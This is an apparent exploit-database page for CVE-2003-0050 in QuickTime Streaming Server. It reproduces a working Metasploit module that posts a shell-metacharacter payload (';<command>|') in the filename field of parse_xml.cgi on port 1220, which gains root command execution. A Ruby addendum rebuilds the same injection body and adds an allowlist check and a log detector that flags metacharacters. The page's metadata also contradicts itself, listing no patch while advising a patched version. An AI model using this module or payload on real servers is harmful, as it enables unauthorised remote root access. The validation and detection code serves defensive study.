QuickTime Streaming Server parse_xml.cgi Remote Execution - exploit.company
Vendor: QuickTime Streaming Server
By: hdm
CVSS: 7.5 (HIGH)
CWE: metacharacter injection
Product Name: QuickTime Streaming Server
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CVE: CVE-2003-0050
CPE: a:apple:quicktime_streaming_server
Metasploit:
Other Scripts:
Platforms Tested: Unix
Year: 2003

QuickTime Streaming Server parse_xml.cgi Remote Execution

The QuickTime Streaming Server ships a CGI script, parse_xml.cgi, whose filename parameter is passed to the underlying system without filtering shell metacharacters. An attacker who can reach the administration port (1220 by default) can therefore inject arbitrary commands, which run with the privileges of the server, i.e. as root.

Mitigation:

Update to a patched version of QuickTime Streaming Server.

Exploit-DB raw data:

##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
			'Description'    => %q{
					The QuickTime Streaming Server contains a CGI script that is vulnerable
				to metacharacter injection, allow arbitrary commands to be executed as root.
				},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'OSVDB', '10562'],
					[ 'BID', '6954' ],
					[ 'CVE', '2003-0050' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 24 2003'
		))

		register_options(
			[
				Opt::RPORT(1220)
			], self.class)
	end

	def exploit

		print_status("Sending post request with embedded command...")

		data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

		response = send_request_raw({
			'uri'	  => "/parse_xml.cgi",
			'method'  => 'POST',
			'data'    => data,
			'headers' =>
			{
				'Content-Type'	 => 'application/x-www-form-urlencoded',
				'Content-Length' => data.length,
			}
		}, 3)

		# A non-200 status usually means the request never reached the vulnerable
		# CGI. Report it, but still start the handler: the injected command may
		# already be running even when the response looks wrong.
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end
end
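The module above injects its payload as the value of the filename form field, wrapped as ";<command>|" so that a command separator precedes the payload and a pipe follows it. The following Ruby script is an added example and not part of the original page or the Metasploit module: it rebuilds that POST body with Ruby's standard form encoding (standing in for Rex::Text.uri_encode, so the percent-encoding may differ slightly while the decoded value is identical), shows what the CGI sees after decoding, and adds the two checks a defender wants, an allowlist validation a hardened CGI would apply before the name reaches open() or a shell, and a request-level detector that flags bodies carrying shell metacharacters in the filename value. The sample bodies are constructed; the command "id" is an assumed payload, and the remark about Perl-style two-argument open() is an assumption about the CGI's implementation, not something the page states.

```ruby
require 'uri'

# Bytes a POSIX shell treats specially. The module's injection string
# ";<cmd>|" relies on ';' (command separator) and the trailing '|', which is
# consistent with a Perl-style two-argument open() treating the name as a
# pipe (assumption about the CGI; the page does not say how it opens files).
SHELL_METACHARACTERS = [";", "|", "&", "`", "$", "(", ")", "<", ">", "\n"].freeze

# Recreate the POST body the module's exploit method builds.
def build_exploit_body(cmd)
  "filename=" + URI.encode_www_form_component(";#{cmd}|")
end

# What the CGI sees after form decoding: the raw filename parameter.
def decode_filename(body)
  URI.decode_www_form(body).to_h["filename"]
end

# Metacharacters present in a decoded filename value (empty when clean).
def metacharacters_in(name)
  SHELL_METACHARACTERS.select { |c| name.include?(c) }
end

# Allowlist check a hardened CGI would apply before the name reaches open()
# or a shell: a plain basename of safe characters, no traversal.
def safe_filename?(name)
  return false if name.nil? || name.empty?
  return false if name.include?("..")
  !!(name =~ /\A[A-Za-z0-9_.-]+\z/)
end

# Request-level detection: true when a POST body for parse_xml.cgi carries a
# filename value containing any shell metacharacter. Suitable for running
# over proxy or web-server logs that record request bodies.
def suspicious_request?(body)
  name = decode_filename(body)
  return false if name.nil?
  !metacharacters_in(name).empty?
end

# Constructed sample bodies: one benign, one built exactly the way the
# module does it (assumed command "id").
SAMPLE_BODIES = {
  "benign"  => "filename=playlist.xml",
  "exploit" => build_exploit_body("id"),
}.freeze

if __FILE__ == $0
  SAMPLE_BODIES.each do |label, body|
    name = decode_filename(body)
    puts "#{label}: body=#{body.inspect} filename=#{name.inspect} " \
         "metachars=#{metacharacters_in(name).inspect} " \
         "safe=#{safe_filename?(name)} flagged=#{suspicious_request?(body)}"
  end
end
```

The allowlist is the fix that matters: rejecting a handful of known-bad characters leaves room for encodings and characters the list forgot, whereas accepting only a plain basename makes the filename inert whatever the CGI does with it afterwards. The detector is the opposite design, a denylist, which is the right tool for spotting exploitation attempts in logs but not for protecting the application itself.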